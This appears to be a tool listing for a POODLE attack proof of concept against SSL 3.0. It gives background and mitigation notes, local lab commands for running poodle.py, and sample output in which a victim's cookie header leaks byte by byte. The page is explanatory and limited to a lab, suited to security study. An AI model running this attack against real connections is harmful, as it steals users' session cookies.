Intoduction:
SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwardscompatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used
POODLE-Attack-Overview
The attack described above requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability.
Optimization Potential :
The PoC implementation of the attack is far from being optimal. Every generated request requires an additional HTTP roundtrip to ask the HTTP server for the next requests parameters, even when the parameters change only after a plaintext byte has leaked in the decryption phase.
Latest Change 14/05/2015:
– Swapped debug/no debug command in poodle-dev.sh and added start-offset
– Added test certificates
– Working version
Test Environment :
– Start HTTP server with: ./poodle-dev.sh httpserver
– Start SSLv3 forwarder to HTTP server from point above with: ./poodle-dev.sh sslserver
– Start PoC with: ./poodle-dev.sh attacker
– Open HTTPS server in browser and accept certificate.
– Open PoC request generator and watch leaking bytes in PoC terminal
Example Output:
$ ./poodle.py --target-port 4433 --start-offset 384 https://localhost:8443 Starting SSL/TLS server on :8443 forwarding to localhost:4433 Starting HTTP server on :8000 generating requests to https://localhost:8443 Decrypted byte 384: C (0x43) in 8.1950 seconds with 57 requests Victim now leaked 1 bytes: "C" 57 requests and 8.195 seconds per leaked bytes, 57 requests and 8.195 seconds total Decrypted byte 385: o (0x6f) in 56.7356 seconds with 405 requests Victim now leaked 2 bytes: "Co" 231 requests and 32.465 seconds per leaked bytes, 462 requests and 64.931 seconds total Decrypted byte 386: o (0x6f) in 73.1930 seconds with 519 requests Victim now leaked 3 bytes: "Coo" 327 requests and 46.041 seconds per leaked bytes, 981 requests and 138.124 seconds total Decrypted byte 387: k (0x6b) in 36.4802 seconds with 259 requests Victim now leaked 4 bytes: "Cook" 310 requests and 43.651 seconds per leaked bytes, 1240 requests and 174.604 seconds total Decrypted byte 388: i (0x69) in 54.8990 seconds with 387 requests Victim now leaked 5 bytes: "Cooki" 325 requests and 45.901 seconds per leaked bytes, 1627 requests and 229.503 seconds total Decrypted byte 389: e (0x65) in 14.2407 seconds with 99 requests Victim now leaked 6 bytes: "Cookie" 287 requests and 40.624 seconds per leaked bytes, 1726 requests and 243.744 seconds total Decrypted byte 390: : (0x3a) in 34.2510 seconds with 240 requests Victim now leaked 7 bytes: "Cookie:" 280 requests and 39.714 seconds per leaked bytes, 1966 requests and 277.995 seconds total
Download : Master.zip | Clone Url
Source : https://github.com/thomaspatzke | http://patzke.org/implementing-the-poodle-attack.html